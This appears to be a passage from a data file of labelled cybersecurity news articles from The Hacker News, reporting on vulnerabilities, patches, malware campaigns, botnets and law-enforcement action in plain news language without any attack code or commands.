According to researchers, attackers can replace these drivers on the printer with malicious files that could allow them to execute code of their choice.
More worrisome: If the printer is behind a firewall, attackers can even hack other device or computer on that particular network, and then use it to host their malicious files.
Watering Hole Attacks via Printers
Like servers, multiple computers are also connected to printers in an effort to print documents as well as download drivers. So, this flaw allows a hacker to execute watering hole attacks technically using printers.
Watering hole attacks, or drive-by downloads, are used to target businesses and organizations by infecting them with malware to gain access to the network.
""Rather than infecting users individually, an attacker can effectively turn one printer into a watering hole that will infect every Windows device that touches it,"" said Vectra chief security officer Gunter Ollmann.
""Anyone connecting to the printer share will download the malicious driver. This moves the attack vector from physical devices to any device on the network capable of hosting a virtual printer image.""
This flaw (CVE-2016-3238) is by far the most dangerous vulnerability of the year, which is easy to execute, provides different ways of launch attacks, and affects a huge number of users.
A second related vulnerability, CVE-2016-3239, in MS16-087 bulletin is a privilege escalation flaw that could allow attackers to write to the file system.
A security bulletin for Microsoft Office, MS16-088, includes patches for seven remote code execution (RCE) vulnerabilities, 6 of them are memory corruption flaws, which affects Microsoft Office, SharePoint Server as well as Office Web Apps.
The flaws can be exploited by specially crafted Office files, allowing attackers to run arbitrary code with same privileges as the logged in user.
Bulletin MS16-084 addresses flaws in Internet Explorer and MS16-085 in Microsoft Edge. The IE flaws include RCE, privilege escalation, information disclosure and security bypass bugs.
Edge flaws include a handful of RCE and memory corruption flaws in the Chakra JavaScript engine, as well as an ASLR bypass, information disclosure, browser memory corruption, and spoofing bugs.
Bulletin MS16-086 addresses a vulnerability in the JScript and VBScript engines in Windows, which could allow an attacker to execute remote code execution flaw, affecting VBScript 5.7 and JScript 5.8.
Rest five bulletins rated as important address flaws in Windows Secure Kernel Mode, Windows Kernel-Mode Drivers, the .NET framework, the Windows Kernel, and Secure Boot process.
Users are advised to patch their system and software as soon as possible.
",Vulnerability
Another Master Key vulnerability discovered in Android 4.3,https://thehackernews.com/2013/11/another-master-key-vulnerability.html,"Earlier this year, in the month of July it was first discovered that 99% of Android devices are vulnerable to a flaw called ""Android Master Key vulnerability"" that allow hackers to modify any legitimate and digitally signed application in order to transform it into a Trojan program that can be used to steal data or take control of the device.
The vulnerability was also responsibly disclosed to Google back in February by Bluebox and but the company did not fix the issue even with Android 4.3 Jelly Bean. Later, Google has also modified its Play Store's app entry process so that apps that have been modified using such exploit are blocked and can no longer be distributed via Play.
Then after a few days, in the last week of July this year, Android Security Squad, the China-based group also uncovered a second Android master key vulnerability similar to the first one.
Security researcher Jay Freeman has discovered yet another Master Key vulnerability in Android 4.3, which is very similar to the flaw reported by Android Security Squad in July.
Jay Freeman, perhaps better known as Saurik for Cydia Software, an application for iOS that enables a user to find and install software packages on jailbroken iOS Apple devices such as the iPhone.
He demonstrated the flaw with a proof of concept exploit, written in Python language.
On Android, all applications are signed by their developers using private cryptographic keys; it is by comparing the certificates used to verify these signatures that Android's package manager determines whether applications are allowed to share information, or what permissions they are able to obtain.
Even the system software itself is signed by the manufacturer of the device and the applications signed by that same key are thereby able to do anything that the system software can.
Like the previous master key bugs, Saurik's exploit allows a hacker to gain complete access to your Android device via a modified system APK, with its original cryptographic key being untouched.
This way the malware can obtain full access to Android system and all applications (and their data) with dangerous system permissions.
Users are advised to download apps or app updates only from trusted sources, preferably from official sources or app stores. Saurik has also updated his Cydia Impactor for Android to include a patch for this bug.
Recently, the source code for Android 4.4 was released in Android Open Source Project, which included a patch for all previously known Android Master Key vulnerabilities.
Update: We have updated the story, and made some correction after Saurik comment, 'the bug I am describing is a bug in Android 4.3, not Android 4.4. The fix for it was included in the code release for Android 4.4, and since it is now disclosed there is no harm to the open device community to describe the bug in public; devices that currently have no exploit are there by now exploitable.'
Thank you!
",Vulnerability
GitHub Updates Policy to Remove Exploit Code When Used in Active Attacks,https://thehackernews.com/2021/06/github-updates-policy-to-remove-exploit.html,"Code-hosting platform GitHub Friday officially announced a series of updates to the site's policies that delve into how the company deals with malware and exploit code uploaded to its service.
""We explicitly permit dual-use security technologies and content related to research into vulnerabilities, malware, and exploits,"" the Microsoft-owned company said. ""We understand that many security research projects on GitHub are dual-use and broadly beneficial to the security community. We assume positive intention and use of these projects to promote and drive improvements across the ecosystem.""
Stating that it will not allow the use of GitHub in direct support of unlawful attacks or malware campaigns that cause technical harm, the company said it may take steps to disrupt ongoing attacks that leverage the platform as an exploit or a malware content delivery network (CDN).
To that end, users are refrained from uploading, posting, hosting, or transmitting any content that could be used to deliver malicious executables or abuse GitHub as an attack infrastructure, say, by organizing denial-of-service (DoS) attacks or managing command-and-control (C2) servers.
""Technical harms means overconsumption of resources, physical damage, downtime, denial of service, or data loss, with no implicit or explicit dual-use purpose prior to the abuse occurring,"" GitHub said.
In scenarios where there is an active, widespread abuse of dual-use content, the company said it might restrict access to such content by putting it behind authentication barriers, and as a ""last resort,"" disable access or remove it altogether when other restriction measures are not feasible. GitHub also noted that it would contact relevant project owners about the controls put in place where possible.
The changes come into effect after the company, in late April, began soliciting feedback on its policy around security research, malware, and exploits on the platform with the goal of operating under a clearer set of terms that would remove the ambiguity surrounding ""actively harmful content"" and ""at-rest code"" in support of security research.
By not taking down exploits unless the repository or code in question is incorporated directly into an active campaign, the revision to GitHub's policies is also a direct result of widespread criticism that followed in the aftermath of a proof-of-concept (PoC) exploit code that was removed from the platform in March 2021.
The code, uploaded by a security researcher, concerned a set of security flaws known as ProxyLogon that Microsoft disclosed were being abused by Chinese state-sponsored hacking groups to breach Exchange servers worldwide. GitHub at the time said it removed the PoC in accordance with its acceptable use policies, citing it included code ""for a recently disclosed vulnerability that is being actively exploited.""
",Malware
WhatsApp-based wormable Android malware spotted on the Google Play Store,https://thehackernews.com/2021/04/whatsapp-based-wormable-android-malware.html,"Cybersecurity researchers have discovered yet another piece of wormable Android malware—but this time downloadable directly from the official Google Play Store—that's capable of propagating via WhatsApp messages.
Disguised as a rogue Netflix app under the name of ""FlixOnline,"" the malware comes with features that allow it to automatically reply to a victim's incoming WhatsApp messages with a payload received from a command-and-control (C&C) server.
""The application is actually designed to monitor the user's WhatsApp notifications, and to send automatic replies to the user's incoming messages using content that it receives from a remote C&C server,"" Check Point researchers said in an analysis published today.
Besides masquerading as a Netflix app, the malicious ""FlixOnline"" app also requests intrusive permissions that allow it to create fake Login screens for other apps, with the goal of stealing credentials and gain access to all notifications received on the device, using it to hide WhatsApp notifications from the user and automatically reply with a specially-crafted payload received from the C&C server.
""The malware's technique is fairly new and innovative,"" said Aviran Hazum, manager of mobile intelligence at Check Point. ""The technique here is to hijack the connection to WhatsApp by capturing notifications, along with the ability to take predefined actions, like 'dismiss' or 'reply' via the Notification Manager.""
A successful infection could allow the malware to spread further via malicious links, steal data from users' WhatsApp accounts, propagate malicious messages to users' WhatsApp contacts and groups, and even extort users by threatening to leak sensitive WhatsApp data or conversations.
The app has since been purged from the Play Store, but not before attracting a total of 500 downloads over the course of two months.
FlixOnline also marks the second time a malicious app has been caught using WhatsApp to spread the malware. In January 2021, ESET researcher Lukas Stefanko disclosed a fake Huawei Mobile app that employed the same modus operandi to perform the wormable attack.
What's more, the message displayed to users upon opening the apps is the same — ""We need your permission to access the application. It will help app (sic) to provide better functionality"" — suggesting the two apps could either be the work of the same attacker or that the authors of FlixOnline drew inspiration from the Huawei Mobile app.
""The fact that the malware was able to be disguised so easily and ultimately bypass Play Store's protections raises some serious red flags,"" Hazum said. ""Although we stopped one campaign of the malware, the malware family is likely here to stay. The malware may return hidden in a different app.""
""Users should be wary of download links or attachments that they receive via WhatsApp or other messaging apps, even when they appear to come from trusted contacts or messaging groups,"" Hazum added.
",Malware
New Ransomware Malware takes Advantage of Windows PowerShell,https://thehackernews.com/2014/06/new-ransomware-malware-takes-advantage.html,"Ransomware is one of the most blatant and obvious money making schemes for cybercriminals and it was most likely to be known when last year Cryptolocker ransomware targeted millions of computers worldwide.
Recently, security researchers at the Antivirus firm TrendLabs have unearthed another sophisticated variant of the ransomware malware which is employing Windows PowerShell in an effort to encrypt files on the victims' computer. The firm detected the variant as TROJ_POSHCODER.A.
Windows PowerShell is a task automation and configuration management framework from Microsoft, consisting of a command-line shell and associated scripting language. It provides full access to COM and WMI, enabling administrators to perform administrative tasks on both local and remote Windows systems as well as WS-Management and CIM enabling management of remote Linux systems and network devices.
It is believed that cybercriminals have used this feature of Windows just in order to make the detection and analysis of the malware harder on an affected system. However, they failed at this point as using Windows PowerShell feature made it much easier for the researchers to detect the malware.
""In this case, using PowerShell made it easier to detect as this malware is also hard-coded,"" reads the blog post. ""Decrypting and analyzing this malware was not too difficult, particularly compared to other ransomware variants.""
TROJ_POSHCODER.A is a script-based malware as it is using the Windows PowerShell feature. The malware makes use of the Advanced Encryption Standard (AES) to encrypt the files, and RSA-4096 public key cryptography to exchange the AES key with the victims in order to decrypt the files.
Once the ransomware is installed and executed on the victim's Windows System, it encrypts the existing files on the infected system and then renames them to {filename}.POSHCODER. In Addition, it also drops UNLOCKYOURFILES.html into every folder.
As soon as all the files on the infected system are encrypted, it displays a message to victims saying ""Your files were encrypted and locked with a RSA4096 key"" and ask them to follow some given instructions in order to decrypt their files as shown in the screenshot:
The instructions in the Ransom note takes users to another page as shown below, asking victims to download the Multibit application to have their own Bitcoin-wallet account for 1 Bitcoin.
After victims purchase the application, they are instructed to fill and submit the form that contains information such as victims' email address, BTC address and ID, as a result to get decryption keys from the threat actors. This new variant have primarily affected English speaking targets in the United States.
In our previous articles, we highlighted many variants of Cryptolocker and other similar threats that has ability to perform additional tasks such as using different languages in their warning and stealing virtual currency from cryptocurrency wallets.
CryptoLocker is especially dangerous because of its infection rate and it is the most damaging Windows virus in a series of recent ransomware Trojans.
We also reported last month that cybercriminals have now begun targeting Smartphones with a special piece of malicious software that locks up the devices until the victims pay a ransom to get the keys to unlock the phone, which highlights how money motivated criminals are continuously improving these threats over time.
What Steps can you take to reduce the risk of your equipment becoming infected? Users are advised to never open email attachments from unknown sources and make backup of your important data to an external device or on the cloud storage. If you believe you have been infected, act quickly. Stay Safe!
",Malware
North Korean Hackers Used 'Torisma' Spyware in Job Offers-based Attacks,https://thehackernews.com/2020/11/north-korean-hackers-used-torisma.html,"A cyberespionage campaign aimed at aerospace and defense sectors in order to install data gathering implants on victims' machines for purposes of surveillance and data exfiltration may have been more sophisticated than previously thought.
The attacks, which targeted IP-addresses belonging to internet service providers (ISPs) in Australia, Israel, Russia, and defense contractors based in Russia and India, involved a previously undiscovered spyware tool called Torisma to stealthily monitor its victims for continued exploitation.
Tracked under the codename of ""Operation North Star"" by McAfee researchers, initial findings into the campaign in July revealed the use of social media sites, spear-phishing, and weaponized documents with fake job offers to trick employees working in the defense sector to gain a foothold on their organizations' networks.
The attacks have been attributed to infrastructure and TTPs (Techniques, Tactics, and Procedures) previously associated with Hidden Cobra — an umbrella term used by the US government to describe all North Korean state-sponsored hacking groups.
The development continues the trend of North Korea, a heavily sanctioned country, leveraging its arsenal of threat actors to support and fund its nuclear weapons program by perpetrating malicious attacks on US defense and aerospace contractors.
While the initial analysis suggested the implants were intended to gather basic victim information so as to assess their value, the latest investigation into Operation North Star exhibits a ""degree of technical innovation"" designed to remain hidden on compromised systems.
Not only did the campaign use legitimate job recruitment content from popular US defense contractor websites to lure targeted victims into opening malicious spear-phishing email attachments, the attackers compromised and used genuine websites in the US and Italy — an auction house, a printing company, and an IT training firm — to host their command-and-control (C2) capabilities.
""Using these domains to conduct C2 operations likely allowed them to bypass some organizations' security measures because most organizations do not block trusted websites,"" McAfee researchers Christiaan Beek and Ryan Sherstibitoff said.
What's more, the first-stage implant embedded in the Word documents would go on to evaluate the victim system data (date, IP Address, User-Agent, etc.) by cross-checking with a predetermined list of target IP addresses to install a second implant called Torisma, all the while minimizing the risk of detection and discovery.
This specialized monitoring implant is used to execute custom shellcode, in addition to actively monitoring for new drives added to the system as well as remote desktop connections.
""This campaign was interesting in that there was a particular list of targets of interest, and that list was verified before the decision was made to send a second implant, either 32 or 64 bits, for further and in-depth monitoring,"" the researchers said.
""Progress of the implants sent by the C2 was monitored and written in a log file that gave the adversary an overview of which victims were successfully infiltrated and could be monitored further.""
",Malware
3 Zero-Day Exploits Hit SonicWall Enterprise Email Security Appliances,https://thehackernews.com/2021/04/3-zero-day-exploits-hit-sonicwall.html,"SonicWall has addressed three critical security vulnerabilities in its hosted and on-premises email security (ES) product that are being actively exploited in the wild.
Tracked as CVE-2021-20021 and CVE-2021-20022, the flaws were discovered and reported to the company by FireEye's Mandiant subsidiary on March 26, 2021, after the cybersecurity firm detected post-exploitation web shell activity on an internet-accessible system within a customer's environment that had SonicWall's ES application running on a Windows Server 2012 installation. A third flaw (CVE-2021-20023) identified by FireEye was disclosed to SonicWall on April 6, 2021.
FireEye is tracking the malicious activity under the moniker UNC2682.
""These vulnerabilities were executed in conjunction to obtain administrative access and code execution on a SonicWall ES device,"" researchers Josh Fleischer, Chris DiGiamo, and Alex Pennino said.
The adversary leveraged these vulnerabilities, with intimate knowledge of the SonicWall application, to install a backdoor, access files, and emails, and move laterally into the victim organization's network.""
A brief summary of the three flaws are below -
CVE-2021-20021 (CVSS score: 9.4) - Allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host
CVE-2021-20022 (CVSS score: 6.7) - Allows a post-authenticated attacker to upload an arbitrary file to the remote host, and
CVE-2021-20023 (CVSS score: 6.7) - A directory traversal flaw that allows a post-authenticated attacker to read an arbitrary file on the remote host.
The administrative access not only enabled the attacker to exploit CVE-2021-20023 to read configuration files, counting those containing information about existing accounts as well as Active Directory credentials but also abuse CVE-2021-20022 to upload a ZIP archive containing a JSP-based web shell called BEHINDER that's capable of accepting encrypted command-and-control (C2) communications.
""With the addition of a web shell to the server, the adversary had unrestricted access to the command prompt, with the inherited permissions of the NT AUTHORITY\SYSTEM account,"" FireEye said, adding the attacker then used ""living off the land"" (LotL) techniques to harvest credentials, move laterally across the network, and even ""compress a subdirectory [that] contains daily archives of emails processed by SonicWall ES.""
In the incident observed by the firm, the threat actor is said to have escalated their attack by conducting an internal reconnaissance activity, albeit briefly, prior to being isolated and removed from the environment, thus foiling their mission. The true motive behind the intrusion remains unclear.
SonicWall users are recommended to upgrade to 10.0.9.6173 Hotfix for Windows and 10.0.9.6177 Hotfix for hardware and ESXi virtual appliances. The SonicWall Hosted Email Security product was automatically patched on April 19 and hence no additional action is required.
UPDATE
The Milpitas-headquartered network security firm labeled the findings as an outcome of routine collaboration with third-party researchers and forensic analysis firms to ensure its products adhere to the security best practices.
""Through the course of this process, SonicWall was made aware of and verified certain zero-day vulnerabilities — in at least one known case, being exploited in the wild — to its hosted and on-premises email security products,"" the company said in a statement to The Hacker News. ""SonicWall designed, tested and published patches to correct the issues and communicated these mitigations to customers and partners.""
",Vulnerability
Google Discloses Unpatched 'High-Severity' Flaw in Apple macOS Kernel,https://thehackernews.com/2019/03/cybersecurity-macos-hacking.html,"Cybersecurity researcher at Google's Project Zero division has publicly disclosed details and proof-of-concept exploit of a high-severity security vulnerability in macOS operating system after Apple failed to release a patch within 90 days of being notified.
Discovered by Project Zero researcher Jann Horn and demonstrated by Ian Beer, the vulnerability resides in the way macOS XNU kernel allows an attacker to manipulate filesystem images without informing the operating system.
The flaw could eventually allow an attacker or a malicious program to bypass the copy-on-write (COW) functionality to cause unexpected changes in the memory shared between processes, leading to memory corruption attacks.
Copy-On-Write, also referred to as COW, is a resource-management optimization strategy used in computer programming.
In general, if any process (destination) requires a file or data that is already in the memory but created by another process (source), both processes can share the same resource rather than creating a new copy of it, significantly reducing the resource consumption of unmodified copies.
However, if the source process needs to make some changes in the data, the copy-on-write (COW) function comes into play and creates a copy of it in the memory so that the destination process can still have access to the data.
According to the Project Zero researcher, on Apple's macOS operating system, this copy-on-write behavior works not only with the anonymous memory, but also efficiently handles the page tables and memory mappings.
""This means that, after the destination process has started reading from the transferred memory area, memory pressure can cause the pages holding the transferred memory to be evicted from the page cache,"" reads the advisory detailing the vulnerability.
""Later, when the evicted pages are needed again, they can be reloaded from the backing filesystem.""
Google researcher finds that when a mounted filesystem image is mutated directly (for example, by calling pwrite() on the filesystem image), this information is not propagated into the mounted filesystem.
Thus, malicious program or an attacker can simply make changes to evicted pages stored on the disk without informing the virtual management subsystem, tricking the destination processes into loading manipulated malicious content into the memory.
""It is important that the copied memory is protected against later modifications by the source process; otherwise, the source process might be able to exploit double-reads in the destination process,"" the resaercher says.
In addition to this vulnerability, the Project Zero researcher also found a similar copy-on-write behavior bypass (CVE-2019-6208) by abusing another function on macOS operating system.
The researcher notified Apple of both the vulnerabilities back in November 2018 and the company privately acknowledged the existence of the flaws. While Apple patched the latter flaw in January 2019 update, the former flaw remains unaddressed even after the 90-day deadline Project Zero provides the affected companies.
So, the researchers made the vulnerability public with a ""high severity"" label and also released the proof-of-concept code that demonstrates the bug, which remains unpatched at the time of writing.
Apple is currently working with the Project Zero team on a fix for the vulnerability, which is intended to be included in a future macOS release.
",Malware
Cybercriminals Hijack Router DNS to Distribute Android Banking Trojan,https://thehackernews.com/2018/04/android-dns-hijack-malware.html,"Security researchers have been warning about an ongoing malware campaign hijacking Internet routers to distribute Android banking malware that steals users' sensitive information, login credentials and the secret code for two-factor authentication.
In order to trick victims into installing the Android malware, dubbed Roaming Mantis, hackers have been hijacking DNS settings on vulnerable and poorly secured routers.
DNS hijacking attack allows hackers to intercept traffic, inject rogue ads on web-pages and redirect users to phishing pages designed to trick them into sharing their sensitive information like login credentials, bank account details, and more.
Hijacking routers' DNS for a malicious purpose is not new. Previously we reported about widespread DNSChanger and Switcher—both the malware worked by changing the DNS settings of the wireless routers to redirect traffic to malicious websites controlled by attackers.
Discovered by security researchers at Kaspersky Lab, the new malware campaign has primarily been targeting users in Asian countries, including South Korea, China Bangladesh, and Japan, since February this year.
Once modified, the rogue DNS settings configured by hackers redirect victims to fake versions of legitimate websites they try to visit and displays a pop-up warning message, which says—""To better experience the browsing, update to the latest chrome version.""
It then downloads the Roaming Mantis malware app masquerading as Chrome browser app for Android, which takes permission to collect device' account information, manage SMS/MMS and making calls, record audio, control external storage, check packages, work with file systems, draw overlay windows and so on.
""The redirection led to the installation of Trojanized applications named facebook.apk and chrome.apk that contained Android Trojan-Banker.""
If installed, the malicious app overlays all other windows immediately to show a fake warning message (in broken English), which reads, ""Account No.exists risks, use after certification.""
Roaming Mantis then starts a local web server on the device and launches the web browser to open a fake version of Google website, asking users to fill up their names and date of births.
To convince users into believing that they are handing over this information to Google itself, the fake page displays users' Gmail email ID configured on their infected Android device, as shown in the screenshots.
""After the user enters their name and date of birth, the browser is redirected to a blank page at https://127.0.0.1:${random_port}/submit,"" researchers said. ""Just like the distribution page, the malware supports four locales: Korean, Traditional Chinese, Japanese and English.""
Since Roaming Mantis malware app has already gained permission to read and write SMS on the device, it allows attackers to steal the secret verification code for the two-factor authentication for victims' accounts.
While analysing the malware code, Researchers found reference to popular South Korean mobile banking and gaming applications, as well as a function that tries to detect if the infected device is rooted.
""For attackers, this may indicate that a device is owned by an advanced Android user (a signal to stop messing with the device) or, alternatively, a chance to leverage root access to gain access to the whole system,"" the researchers said.
What's interesting about this malware is that it uses one of the leading Chinese social media websites (my.tv.sohu.com) as its command-and-control server and sends commands to infected devices just via updating the attacker-controlled user profiles.
According to Kaspersky's Telemetry data, the Roaming Mantis malware was detected more than 6,000 times, though the reports came from just 150 unique users.
You are advised to ensure your router is running the latest version of the firmware and protected with a strong password.
You should also disable router's remote administration feature and hardcode a trusted DNS server into the operating system network settings.
",Cyber_Attack
"Apple left iOS 10 Kernel Code Unencrypted, Intentionally!",https://thehackernews.com/2016/06/apple-ios-kernel.html,"Apple's new iOS 10 recently made headlines after MIT Technology Review revealed that the company had left the kernel of the mobile operating system unencrypted.
Yes, the first developer preview of iOS 10 released at WWDC has an unencrypted kernel.
When the headline broke, some of the users were surprised enough that they assumed Apple had made a mistake by leaving unencrypted kernel in iOS 10, and therefore, would get reverted in the next beta version of the operating system.
However, Apple managed to confirm everyone that the company left the iOS 10 kernel unencrypted intentionally, as the kernel cache does not contain any critical or private information of users.
On iOS, the kernel is responsible for things like security and how applications are capable of accessing the parts of an iPhone or an iPad.
But, Why Apple had left the iOS wide open when other features like iMessage offer end-to-end encryption?
Apple did this on purpose, because by leaving the iOS 10 kernel unencrypted, the company was ""able to optimize the operating system's performance without compromising security,"" an Apple spokesperson told TechCrunch.
The kernel is the heart of any operating system. Apple has always kept the kernel under several layers of protection in previous versions of iOS, leaving developers as well as researchers in the dark.
So, the unencrypted kernel could help developers and security researchers look more closely at its code and find security flaws. After all, if more eyes are looking for flaws, it would be easier to discover and patch the issues more quickly than before.
MIT Technology Review also pointed out that this could prevent government and law enforcement agencies from exploiting vulnerabilities to crack locked iOS devices, like what the FBI did to hack into the San Bernardino shooter's iPhone.
",Vulnerability
New Botnet Hunts for Linux — Launching 20 DDoS Attacks/Day at 150Gbps,https://thehackernews.com/2015/09/xor-ddos-attack.html,"A network of compromised Linux servers has grown so powerful that it can blow large websites off the Internet by launching crippling Distributed Denial-of-service (DDoS) attacks of over 150 gigabits per second (Gbps).
The distributed denial-of-service network, dubbed XOR DDoS Botnet, targets over 20 websites per day, according to an advisory published by content delivery firm Akamai Technologies.
Over 90 percent of the XOR DDoS targets are located in Asia, and the most frequent targets are the gaming sector and educational institutions.
XOR creator is supposed to be from China, citing the fact that the IP addresses of all Command and Control (C&C) servers of XOR are located in Asia, where most of the infected Linux machines also reside.
How XOR DDoS Botnet infects Linux System?
Unlike other DDoS botnets, the XOR DDoS botnet infects Linux machines via embedded devices such as network routers and then brute forces a machine's SSH service to gain root access to targeted machines.
Once the attackers have acquired Secure Shell credentials and logged in, they use root privileges to run a simple shell script that secretly downloads and installs the malicious XOR botnet software.
However, there is no such evidence that XOR DDoS infects computers by exploiting flaws in the Linux operating system itself.
A High-Bandwidth DDoS Attack
Akamai's Security Intelligence Response Team (SIRT) has seen DDoS attacks – SYN and DNS floods as the observed attack vectors – with the bandwidth ranging from a few gigabits per second (Gbps) to nearly 179 Gbps.
The upper figure is a massive DDoS attack volume that even most multinational corporate networks can not handle. However, the biggest recorded DDoS attacks have hit 400 Gbps.
""Over the past year, the XOR DDoS botnet has grown and is now capable of being used to launch [massive] DDoS attacks,"" Stuart Scholly, senior vice president of Akamai's Security Business Unit, said in a statement.
Scholly further added that attackers are switching their focus from Windows botnets and building Linux botnets to launch massive DDoS attacks. However in the past, Windows machines were their primary targets for DDoS malware.
How to Detect and Mitigate XOR DDoS Botnet?
Akamai's advisory outlines two different methods for detecting the recent version of the XOR malware.
To Detect XOR DDoS Botnet in your Network, look for the communications between a bot and its C&C server, using the Snort rule given in the advisory.
To Detect XOR DDoS Botnet infection on your Hosts, use the YARA rule also shown in the advisory.
Moreover, Akamai also provides a four-step process for removing the XOR DDoS Trojan from your machine, as given below:
First, identify the malicious files in two directories (/boot and /etc/init.d)
Identify the supporting processes responsible for the persistence of the main process
Kill the malicious processes
Delete the malicious files (in /boot and /etc/init.d)
Additionally, disabling system root login from SSH (Secure Shell), or using a strong password will also defeat this issue.
",Cyber_Attack
Europol Now Going After People Who Bought DDoS-for-Hire Services,https://thehackernews.com/2019/01/ddos-for-hire-services.html,"If you were a buyer of any online DDoS-for-hire service, you might be in trouble.
After taking down and arresting the operators of the world's biggest DDoS-for-hire service last year, the authorities are now in hunt for customers who bought the service that helped cyber criminals launch millions of attacks against several banks, government institutions, and gaming industry.
Europol has announced that British police are conducting a number of live operations worldwide to track down the users of the infamous Webstresser.org service that the authorities dismantled in April 2018.
Launched in 2015, Webstresser let its customers rent the service for about £10 to launch Distributed Denial of Service (DDoS) attacks against their targets with little to no technical knowledge, which resulted in more than 4 million DDoS attacks.
According to the Europol announcement published on Monday, the agency gained access to the accounts of over 151,000 registered Webstresser users last year when it shut down the service and have now uncovered a ""trove of information"" against some users that could help the agency track them down.
Europol said more than 250 users of Webstresser and other DDoS-for-hire services will soon face potential prosecution for the damage they have caused.
""Size does not matter — all levels of users are under the radar of law enforcement, be it a gamer booting out the competition out of a game, or a high-level hacker carrying out DDoS attacks against commercial targets for financial gain,"" Europol said.
In the United Kingdom, several webstresser.org users have recently been visited by the police. In the Netherlands, the police are trying to link user profiles to the identities of Dutch people, while ""a Dutch user of webstresser.org has already received this alternative sanction.""
Other countries, including the United States, Belgium, Croatia, France, Germany, Greece, Denmark, Romania, Estonia, Hungary, Ireland, Switzerland, Norway, Lithuania, Portugal, Slovenia, Sweden, Australia, Colombia, Serbia, have also joined the fight against DDoS attacks.
While some of these countries are focusing their actions specifically against the Webstresser users, some have intensified their activities against the users of any DDoS booter or stresser service.
""To this effect, the FBI seized last December 15 other DDoS-for-hire websites, including the relatively well known Downthem and Quantum Stresser,"" Europol said. ""Similarly, the Romanian police has taken measures against the administrators of 2 smaller-scale DDoS platforms and has seized digital evidence, including information about the users.""
So, users of all DDoS-for-Hire services are in danger of being prosecuted.
",Cyber_Attack
FinFisher spyware found running on computers all over the world,https://thehackernews.com/2012/08/finfisher-spyware-found-running-on.html,"FinFisher, a software application used by law enforcement agencies for surveillance, appears to be far more widespred than originally thought.Sold by British company Gamma Internationl Gmbh, FinFisher secretly monitors computers by turning on webcams, recording everything the user types with a keylogger, and monitoring Skype calls.
It can also bypass popular antivirus products, communicate covertly with remote servers, record emails, chats, and VOIP calls, and harvesting data from the hard drive.
On Wednesday, computer security company Rapid7 researcher Claudio Guarnieri shared new details of the workings of FinFisher, a piece of malware sold by UK contractor Gamma Group to government agencies. He found FinFisher servers at work in Australia, Czech Republic, United Arab Emirates, Ethiopia, Estonia, Indonesia, Latvia, Mongolia, Qatar, and the United States.
Rapid7 has published the IP addresses and communication ""fingerprint"" of the command and control servers it has discovered. The information can be used in intrusion detection systems. ""If you can identify those networks actually communicating with those IPs, it most likely means some of the people on those networks are being spied on in some way,"" Guarnieri said.
Muench, who is based in Munich, has said his company didn't sell FinFisher spyware to Bahrain. He said he's investigating whether the samples used against Bahraini activists were stolen demonstration copies or were sold via a third party.
",Malware
"Adobe Issues Critical Patches for ColdFusion, Flash Player, Campaign",https://thehackernews.com/2019/06/adobe-patch-june.html,"It's Patch Tuesday week!
Adobe has just released the latest June 2019 software updates to address a total 11 security vulnerabilities in its three widely-used products Adobe ColdFusion, Flash Player, and Adobe Campaign.
Out of these, three vulnerabilities affect Adobe ColdFusion, a commercial rapid web application development platform—all critical in severity—that could lead to arbitrary code execution attacks.
Here below you can find brief information about all newly patched ColdFusion flaws:
CVE-2019-7838 — This vulnerability has been categorized as ""File extension blacklist bypass"" and can be exploited if the file uploads directory is web accessible.
CVE-2019-7839 — There's a command injection vulnerability in ColdFusion 2016 and 2018 editions, but it does not impact ColdFusion version 11.
CVE-2019-7840 — This flaw originates from the deserialization of untrusted data and also leads to arbitrary code execution on the system.
Besides ColdFusion, Adobe has patched just one vulnerability (CVE-2019-7845) in the infamous Flash Player software this month, which is also critical in severity and leads to arbitrary code execution on the affected Windows, macOS, Linux or Chrome OS-based system.
This flaw was reported by an anonymous cybersecurity researcher to the Adobe and can now be patched by installing the latest Flash player version 32.0.0.207.
The rest 7 flaws that Adobe patched this month resides in Adobe Campaign Classic (ACC), an advanced cross-channel marketing and campaign management platform, one of which is critical in severity, three have been rated important and other 3 poses little threat to users.
The only critical flaw (CVE-2019-7843) in Adobe Campaign could allow attackers to execute commands on the affected systems (Windows and Linux) through arbitrary code execution flaw.
At the time of writing, the company is not aware of any in-the-wild exploit for the vulnerabilities it addressed today.
Adobe has released updated versions of all three vulnerable software for each impacted platform that users should install immediately to protect their systems and businesses from cyber attacks.
",Vulnerability
New Adobe Flash Zero-Day Exploit Found Hidden Inside MS Office Docs,https://thehackernews.com/2018/12/flash-player-vulnerability.html,"Cybersecurity researchers have discovered a new zero-day vulnerability in Adobe Flash Player that hackers are actively exploiting in the wild as part of a targeted campaign appears to be attacking a Russian state health care institution.
The vulnerability, tracked as CVE-2018-15982, is a use-after-free flaw resides in Flash Player that, if exploited successfully, allows an attacker to execute arbitrary code on the targeted computer and eventually gain full control over the system.
The newly discovered Flash Player zero-day exploit was spotted last week by researchers inside malicious Microsoft Office documents, which were submitted to online multi-engine malware scanning service VirusTotal from a Ukrainian IP address.
The maliciously crafted Microsoft Office documents contain an embedded Flash Active X control in its header that renders when the targeted user opens it, causing exploitation of the reported Flash player vulnerability.
According to cybersecurity researchers, neither the Microsoft Office file (22.docx) nor the Flash exploit (inside it) itself contain the final payload to take control over the system.
Instead, the final payload is hiding inside an image file (scan042.jpg), which is itself an archive file, that has been packed along with the Microsoft Office file inside a parent WinRAR archive which is then distributed through spear-phishing emails, as shown in the video below:
Upon opening the document, the Flash exploit executes a command on the system to unarchive the image file and run the final payload (i.e., backup.exe) which has been protected with VMProtect and programmed to install a backdoor that is capable of:
monitoring user activities (keyboard or moves the mouse)
collecting system information and sending it to a remote command-and-control (C&C) server,
executing shellcode,
loading PE in memory,
downloading files
execute code, and
performing self-destruction.
Researchers from Gigamon Applied Threat Research and Chinese cyber-security firm Qihoo 360 Core Security, who spotted and named the malware campaign as ""Operation Poison Needles,"" have not attributed the attack to any state-sponsored hacking group.
However, since the maliciously crafted documents in question purport to be an employment application for a Russian state healthcare clinic that is affiliated to the Presidential Administration of Russia and was uploaded on VirusTotal from a Ukrainian IP, researchers believe the attackers could be from Ukraine, considering the political tension between the two countries.
The vulnerability impacts Adobe Flash Player versions 31.0.0.153 and earlier for products including Flash Player Desktop Runtime, Flash Player for Google Chrome, Microsoft Edge and Internet Explorer 11. Adobe Flash Player Installer versions 31.0.0.108 and earlier is also affected.
Researchers reported the Flash zero-day exploit to Adobe on November 29, after which the company acknowledged the issue and released updated Adobe Flash Player version 32.0.0.101 for Windows, macOS, Linux, and Chrome OS; and Adobe Flash Player Installer version 31.0.0.122.
